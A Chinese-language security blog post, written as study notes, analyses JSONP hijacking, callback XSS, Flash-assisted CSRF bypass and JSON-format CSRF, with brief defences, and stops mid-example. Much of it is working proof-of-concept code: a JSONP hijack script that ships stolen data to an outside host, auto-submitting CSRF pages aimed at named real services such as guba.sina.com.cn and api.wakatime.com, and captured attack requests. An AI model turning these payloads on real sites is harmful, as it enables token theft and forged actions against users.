<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="th3wind">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="th3wind">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="纯净水@流云-自留地">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>json与jsonp的学习与分析 · 纯净水@流云</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >凡心所向，素履所往</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">json与jsonp的学习与分析</a>
            </div>
    </div>
    
    <a class="home-link" href=/>凡心所向，素履所往</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            json与jsonp的学习与分析
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">4.4k</span>阅读时长: <span class="post-count reading-time">21 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/07/21</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>[TOC]</p>
<h1 id="json与jsonp的学习与分析"><a href="#json与jsonp的学习与分析" class="headerlink" title="json与jsonp的学习与分析"></a>json与jsonp的学习与分析</h1><h2 id="json和jsonp的区别"><a href="#json和jsonp的区别" class="headerlink" title="json和jsonp的区别"></a>json和jsonp的区别</h2><p>避免在后续的工作中把json和jsonp搞混，这里说明下其区别</p>
<p>json是一种传输格式，这个不用多说，而jsonp简单来说就是利用script标签绕过同源策略，获得一个类似这样的数据，只支持get请求</p>
<p>json劫持这里属于csrf的范畴，通过回调函数名称，进行敏感数据获取。</p>
<pre><code>&lt;script&gt;
function test(data){
    //alert(v.name);
    var xmlhttp = new XMLHttpRequest();
    var url = &quot;http://xx.xx.xx.xx/&quot; + JSON.stringify(data);
    xmlhttp.open(&quot;GET&quot;,url,true);
    xmlhttp.send();
    }
&lt;/script&gt;
&lt;script src=&quot;http://xx.xx.xx.xx/1.php?callback=test&quot;&gt;&lt;/script&gt;
</code></pre><h2 id="jsonp-简介"><a href="#jsonp-简介" class="headerlink" title="jsonp 简介"></a>jsonp 简介</h2><p>json padding 将json数据填充进回调函数；在客户端创建一个回调函数并将回调函数名传给服务端，服务端根据定义的回调函数名的方法，将获取的json数据传入方法，完成回调。</p>
<h2 id="jsonp-风险"><a href="#jsonp-风险" class="headerlink" title="jsonp 风险"></a>jsonp 风险</h2><h3 id="jsonp劫持"><a href="#jsonp劫持" class="headerlink" title="jsonp劫持"></a>jsonp劫持</h3><h4 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h4><ul>
<li>只使用csrf-token进行csrf校验</li>
</ul>
<p>获取csrf token这类跨域问题，CORS、PostMessage以及jsonp，这里我们先讨论jsonp的情况，在遇到这类时，可以先尝试检查是否存在泄漏token的jsonp。</p>
<h4 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h4><ul>
<li>测试方法，在get url中添加jsonp常用回调函数（可以根据具体的情况判断），常用函数名的变量名如下：<pre><code>callback、jsonpcallback、func
</code></pre>通过jsonp获取到后端身份校验token，构造CSRF页面 嵌入获取到的token值，进行后段绕过校验CSRF攻击。<br>利用示例：<pre><code>&lt;html&gt;
&lt;head&gt;
&lt;title&gt;test&lt;/title&gt;
&lt;meta charset=&quot;utf-8&quot;&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action=&quot;http://guba.sina.com.cn/api/?s=Thread&amp;a=safe_post&quot; method=&quot;POST&quot; id=&quot;csrfsend&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;bid&quot; value=&quot;9947&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;tid&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;content&quot; value=&quot;这是测试结果&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;title&quot; value=&quot;这是测试标题&quot;&gt;
&lt;input type=&quot;hidden&quot; id=&quot;token&quot; name=&quot;_csrf_token&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;anonymous&quot; value=&quot;1&quot;&gt;
&lt;/form&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function hehehe(obj){
  console.log(obj);
  var csrf_token = obj[&quot;result&quot;][&quot;data&quot;][&quot;_csrf_token&quot;];
  document.getElementById(&quot;token&quot;).value = csrf_token;
  document.getElementById(&quot;csrfsend&quot;).submit();
}
&lt;/script&gt;
&lt;script type=&quot;text/javascript&quot; src=&quot;http://guba.sina.com.cn/api/?s=Thread&amp;a=safe_post&amp;callback=hehehe&amp;bid=9947&quot;&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre><h4 id="防范措施"><a href="#防范措施" class="headerlink" title="防范措施"></a>防范措施</h4></li>
<li>referer限制（注意referer过滤是否正则可绕过如<a href="http://www.qq.com.attack.com/attack.htm或http://www.attack.com/attack.htm?qq.com、空referer）" target="_blank" rel="noopener">http://www.qq.com.attack.com/attack.htm或http://www.attack.com/attack.htm?qq.com、空referer）</a></li>
<li>随机token</li>
</ul>
<h3 id="callback可自定义导致的安全问题-典型案例"><a href="#callback可自定义导致的安全问题-典型案例" class="headerlink" title="callback可自定义导致的安全问题 典型案例"></a>callback可自定义导致的安全问题 典型案例</h3><h4 id="Content-Type与XSS漏洞"><a href="#Content-Type与XSS漏洞" class="headerlink" title="Content-Type与XSS漏洞"></a>Content-Type与XSS漏洞</h4><h5 id="利用条件-1"><a href="#利用条件-1" class="headerlink" title="利用条件"></a>利用条件</h5><ul>
<li>输出json时，没有严格定义Content-Type（Content-Type: application/json）</li>
<li>callback 输出点没有进行过滤处理</li>
</ul>
<h5 id="利用方式-1"><a href="#利用方式-1" class="headerlink" title="利用方式"></a>利用方式</h5><h5 id="防范"><a href="#防范" class="headerlink" title="防范"></a>防范</h5><ul>
<li>严格定义Content-Type: application/json</li>
</ul>
<ol>
<li>Content-Type校验不严漏洞</li>
</ol>
<p>在python Bottle中出现过这个问题，对应的cve编号CVE-2014-3137，在该漏洞中Bottle框架会接受诸如“text / plain; application / json”作为json内容 application/json<br>类型，攻击者可能会使用它来绕过安全机制，例如，Chrome不允许将内容类型设置为“application / json”的跨源xmlhttprequests，但在bottel中可以将其设置为“text / plain; application / json”绕过。</p>
<p>绕过形式 Content-Type防御解析HTML的事件，例如在IE6、7等版本请求的URL文件后加一个/x.html就可以解析</p>
<pre><code>http://127.0.0.1/getUsers.php/x.html?callback=＜script＞alert(/xss/)＜/script＞
</code></pre><ul>
<li>过滤callback以及JSON数据输出<br>注意 旧版ie中的utf7-BOM导致的问题</li>
</ul>
<h3 id="MHTML与JSONP"><a href="#MHTML与JSONP" class="headerlink" title="MHTML与JSONP"></a>MHTML与JSONP</h3><p>MHTML（MIME HTML协议）协议解析跨域漏洞，这个有点老，先不管</p>
<h3 id="FLASH与JSONP"><a href="#FLASH与JSONP" class="headerlink" title="FLASH与JSONP"></a>FLASH与JSONP</h3><p>这个也是早年的漏洞问题了，这里要稍微注意下content-type与jsonp的关系，执行jsonp的状态下</p>
<pre><code>Content-Type = &#39;application/json;charset=UTF-8&#39; 
Content-Type = &#39;text/json;charset=UTF-8&#39; 
Content-Type = &#39;text/javascript;charset=UTF-8&#39; 
Content-Type =&#39;application/javascript;charset=UTF-8&#39;
</code></pre><p>严格来说json格式也属于js对象的子集，严格的JavaScript对象表示法来表示结构化的数据，所以使用content-type为javascript时，服务端也认可客户端提交的json格式数据。</p>
<h5 id="FLASH的调用及域"><a href="#FLASH的调用及域" class="headerlink" title="FLASH的调用及域"></a>FLASH的调用及域</h5><ul>
<li>html调用flash，flash可以改后缀名(swf改成gif等)。</li>
<li>flash可以单独访问，但是其效果类似与html调用同域的flash，但只这个后缀必须是swf。</li>
<li>flash发动请求时，是根据flash的域来判断的，而不是html来判断：</li>
</ul>
<ol>
<li>flash请求同域资源时，直接忽视crossdomain.xml。</li>
<li>flash（跨域传输数据）请求外域资源时，受外域下crossdomain.xml里的策略限制。</li>
</ol>
<p>在CSRF的防御策略上，一般是通过referer以及token校验，但在借用flash上传的时候，可以绕过CSRF的referer和token限制。在只有referer校验的CSRF，就可以直接用 上传flash利用，在有token校验的时候，就要劫持token，在用到jsonp，就可以用jsonp劫持token，进一步利用</p>
<h5 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h5><p>利用思路如下：</p>
<ol>
<li>将flash文件上传到存在上传处的目标网站中</li>
<li>用户触发该flash中的csrf代码，由于flash请求同源资源时，直接忽视crossdomain.xml,flash发送的请求的Referer是flash的因此referer校验无效，在存在jsonp劫持的条件下，可以获取用户token，这个时候token校验值也无效了。通过flash上传+jsonp劫持绕过referer校验和token校验达到CSRF。</li>
</ol>
<h5 id="利用验证"><a href="#利用验证" class="headerlink" title="利用验证"></a>利用验证</h5><p>在利用这个jsonp之前，先来了解一下swf-json-csrf</p>
<h6 id="利用环境"><a href="#利用环境" class="headerlink" title="利用环境"></a>利用环境</h6><ul>
<li>支持旧版本flash浏览器<br>GET以及POST请求可用：</li>
</ul>
<p>chrome 61.0及以前</p>
<p>firefox 52.0.1及以前</p>
<p>Opera 47.0及以前</p>
<p>Safari 11.0及以前</p>
<ul>
<li>开启referer验证+token验证</li>
</ul>
<h3 id="利用JSONP进行水坑攻击"><a href="#利用JSONP进行水坑攻击" class="headerlink" title="利用JSONP进行水坑攻击"></a>利用JSONP进行水坑攻击</h3><p>这个是乌云里面一篇较早的文章了，水坑攻击者在有漏洞的网站上部署上可触发获取别的网站有用信息的js，如：攻击者在A网站上插入了可执行的js，建立水坑；js利用callback获取第三方网站B上的对应用户信息；将获取的信息解析发送给攻击者自己的接收平台。</p>
<h2 id="JSON风险"><a href="#JSON风险" class="headerlink" title="JSON风险"></a>JSON风险</h2><p>目标是 利用FLASH利用JSON跨站点请求伪造</p>
<h3 id="JSON格式的CSRF"><a href="#JSON格式的CSRF" class="headerlink" title="JSON格式的CSRF"></a>JSON格式的CSRF</h3><p>当数据内容提交为json格式的报文时，CSRF和常规的CSRF就不一样了，即便这个CSRF没有校验referer和token，这个时候post的数据用form形式提交，将json内容放在name属性中，这个时候会有一个value值，当这个value值为空的时候，数值会有一个”=”，正常情况下服务端json解析器在校验的时候可能会拒绝这个请求（不符合格式）。</p>
<p>随意在burp里面翻了个包来测试 效果如下：</p>
<pre><code>POST /get_flags_async HTTP/1.1
Host: experiment.appadhoc.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://blog.csdn.net/
Content-Type: application/json;charset=UTF-8
Content-Length: 551
Origin: https://blog.csdn.net
Connection: close

{&quot;app_key&quot;:&quot;*****&quot;,&quot;client_id&quot;:&quot;*****&quot;,&quot;summary&quot;:{&quot;sdk_api_version&quot;:&quot;2.0&quot;,&quot;sdk_version&quot;:&quot;4.24.0&quot;,&quot;OS&quot;:&quot;Mac OS&quot;,&quot;os_version&quot;:&quot;10.13&quot;,&quot;os_version_name&quot;:&quot;10.13&quot;,&quot;device_model&quot;:&quot;MacIntel&quot;,&quot;country&quot;:&quot;CN&quot;,&quot;language&quot;:&quot;zh&quot;,&quot;locale&quot;:&quot;zh_CN&quot;,&quot;display_height&quot;:728,&quot;display_width&quot;:1440,&quot;device_type&quot;:&quot;Mac&quot;,&quot;device_vendor&quot;:&quot;&quot;,&quot;url&quot;:&quot;*****&quot;,&quot;referrer&quot;:&quot;&quot;,&quot;browser&quot;:&quot;Firefox&quot;,&quot;browser_version&quot;:&quot;56.0&quot;,&quot;browser_version_name&quot;:&quot;56.0&quot;,&quot;browser_engine&quot;:&quot;Gecko&quot;,&quot;source&quot;:&quot;&quot;},&quot;custom&quot;:{}}
</code></pre><p>借用burp生成的csrf的POC，将json内容置为name，value置为空</p>
<pre><code>&lt;html&gt;
  &lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState(&#39;&#39;, &#39;&#39;, &#39;/&#39;)&lt;/script&gt;
    &lt;form action=&quot;https://experiment.appadhoc.com/get_flags_async&quot; method=&quot;POST&quot; enctype=&quot;text/plain&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;{&quot;app_key&quot;:&quot;******&quot;,&quot;client_id&quot;:&quot;******&quot;,&quot;summary&quot;:{&quot;sdk_api_version&quot;:&quot;2.0&quot;,&quot;sdk_version&quot;:&quot;4.24.0&quot;,&quot;OS&quot;:&quot;Mac OS&quot;,&quot;os_version&quot;:&quot;10.13&quot;,&quot;os_version_name&quot;:&quot;10.13&quot;,&quot;device_model&quot;:&quot;MacIntel&quot;,&quot;country&quot;:&quot;CN&quot;,&quot;language&quot;:&quot;zh&quot;,&quot;locale&quot;:&quot;zh_CN&quot;,&quot;display_height&quot;:728,&quot;display_width&quot;:1440,&quot;device_type&quot;:&quot;Mac&quot;,&quot;device_vendor&quot;:&quot;&quot;,&quot;url&quot;:&quot;******&quot;,&quot;referrer&quot;:&quot;&quot;,&quot;browser&quot;:&quot;Firefox&quot;,&quot;browser_version&quot;:&quot;56.0&quot;,&quot;browser_version_name&quot;:&quot;56.0&quot;,&quot;browser_engine&quot;:&quot;Gecko&quot;,&quot;source&quot;:&quot;&quot;},&quot;custom&quot;:{}}&quot; value=&quot;&quot; /&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

</code></pre><p>请求内容如下：</p>
<pre><code>POST /get_flags_async HTTP/1.1
Host: experiment.appadhoc.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://burp/
Content-Type: text/plain
Content-Length: 554
Connection: close
Upgrade-Insecure-Requests: 1

{&quot;app_key&quot;:&quot;******&quot;,&quot;client_id&quot;:&quot;******&quot;,&quot;summary&quot;:{&quot;sdk_api_version&quot;:&quot;2.0&quot;,&quot;sdk_version&quot;:&quot;4.24.0&quot;,&quot;OS&quot;:&quot;Mac OS&quot;,&quot;os_version&quot;:&quot;10.13&quot;,&quot;os_version_name&quot;:&quot;10.13&quot;,&quot;device_model&quot;:&quot;MacIntel&quot;,&quot;country&quot;:&quot;CN&quot;,&quot;language&quot;:&quot;zh&quot;,&quot;locale&quot;:&quot;zh_CN&quot;,&quot;display_height&quot;:728,&quot;display_width&quot;:1440,&quot;device_type&quot;:&quot;Mac&quot;,&quot;device_vendor&quot;:&quot;&quot;,&quot;url&quot;:&quot;******&quot;,&quot;referrer&quot;:&quot;&quot;,&quot;browser&quot;:&quot;Firefox&quot;,&quot;browser_version&quot;:&quot;56.0&quot;,&quot;browser_version_name&quot;:&quot;56.0&quot;,&quot;browser_engine&quot;:&quot;Gecko&quot;,&quot;source&quot;:&quot;&quot;},&quot;custom&quot;:{}}=
</code></pre><p>返回结果：json解析器并不解析，并且Content-Type为也由原本的application/json转换为text/plain类型</p>
<pre><code>HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Fri, 22 Feb 2019 07:52:08 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 77
Connection: close
Access-Control-Allow-Origin: *

The request content was malformed:
unknown token =
Near: e&quot;:&quot;&quot;},&quot;custom&quot;:{}}=
</code></pre><h4 id="服务器查找json格式的数据但不验证Content-type"><a href="#服务器查找json格式的数据但不验证Content-type" class="headerlink" title="服务器查找json格式的数据但不验证Content-type"></a>服务器查找json格式的数据但不验证Content-type</h4><p>对于服务器查找json格式的数据但不验证Content-type的情况，可以尝试以下方法(使用Content-type：text / plain来实现)：</p>
<ul>
<li>方法一 fetch api的调用<pre><code>&lt;html&gt;
&lt;title&gt;JSON CSRF POC&lt;/title&gt;
&lt;body&gt;
&lt;center&gt;
&lt;h1&gt; JSON CSRF POC &lt;/h1&gt;
&lt;script&gt;
fetch(&#39;http://vul-app.com&#39;, {method: &#39;POST&#39;, credentials: &#39;include&#39;, headers: {&#39;Content-Type&#39;: &#39;text/plain&#39;}, body: &#39;{&quot;name&quot;:&quot;attacker&quot;,&quot;email&quot;:&quot;attacker.com&quot;}&#39;});
&lt;/script&gt;
&lt;form action=&quot;#&quot;&gt;
&lt;input type=&quot;button&quot; value=&quot;Submit&quot; /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre></li>
</ul>
<ul>
<li>方法二 hackerone 上的方法<pre><code>&lt;html&gt;
&lt;head&gt;
&lt;script src=&quot;https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js&quot;&gt;&lt;/script&gt;
&lt;script&gt;
$( document ).ready(function() {
  $(&quot;#z&quot;).attr(&quot;name&quot;,&#39;{&quot;entity&quot;:&quot;https://zzz.com&quot;,&quot;type&quot;:&quot;domain&quot;,&quot;time&quot;:&quot;&#39;+($.now()/1000)+&#39;&quot;,&quot;project&quot;:&quot;&lt;&lt;LAST_PROJECT&gt;&gt;&quot;,&quot;is_debugging&quot;:false,&quot;plugin&quot;:&quot;chrome-wakatime/1.0.2&quot;,&quot;fakeparam&quot;:&quot;&#39;);
  $(&quot;#f&quot;).submit();
});
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form id=&quot;f&quot; ENCTYPE=&quot;text/plain&quot; action=&quot;https://api.wakatime.com/api/v1/users/current/heartbeats&quot; method=&quot;post&quot;&gt;
&lt;input id=&quot;z&quot; type=&quot;hidden&quot; name=&#39;test&#39; value=&#39;test&quot;}&#39;&gt; 
&lt;input type=&quot;submit&quot; value=&quot;send&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre></li>
</ul>
<p>给value赋予一个值，构造正常的json数据包<br>形式一：用单引号构造</p>
<pre><code>&lt;html&gt;
  &lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState(&#39;&#39;, &#39;&#39;, &#39;/&#39;)&lt;/script&gt;
    &lt;form action=&quot;https://experiment.appadhoc.com/get_flags_async&quot; method=&quot;POST&quot; enctype=&quot;text/plain&quot;&gt;
      &lt;input name=&#39;{&quot;app_key&quot;:&quot;*****&quot;,&quot;client_id&quot;:&quot;*****&quot;,&quot;summary&quot;:{&quot;sdk_api_version&quot;:&quot;2.0&quot;,&quot;sdk_version&quot;:&quot;4.24.0&quot;,&quot;OS&quot;:&quot;Mac OS&quot;,&quot;os_version&quot;:&quot;10.13&quot;,&quot;os_version_name&quot;:&quot;10.13&quot;,&quot;device_model&quot;:&quot;MacIntel&quot;,&quot;country&quot;:&quot;CN&quot;,&quot;language&quot;:&quot;zh&quot;,&quot;locale&quot;:&quot;zh_CN&quot;,&quot;display_height&quot;:728,&quot;display_width&quot;:1440,&quot;device_type&quot;:&quot;Mac&quot;,&quot;device_vendor&quot;:&quot;&quot;,&quot;url&quot;:&quot;https://blog.csdn.net/&quot;,&quot;referrer&quot;:&quot;&quot;,&quot;browser&quot;:&quot;Firefox&quot;,&quot;browser_version&quot;:&quot;56.0&quot;,&quot;browser_version_name&quot;:&quot;56.0&quot;,&quot;browser_engine&quot;:&quot;Gecko&quot;,&quot;source&quot;:&quot;&quot;},&quot;custom&quot;:{},&quot;test&quot;:&quot;&#39; value=&#39;test&quot;}&#39; type=&#39;hidden&#39;&gt; 
      &lt;input type=submit&gt; 
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;


请求数据：
POST /get_flags_async HTTP/1.1
Host: experiment.appadhoc.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: text/plain
Content-Length: 124
Connection: close
Upgrade-Insecure-Requests: 1

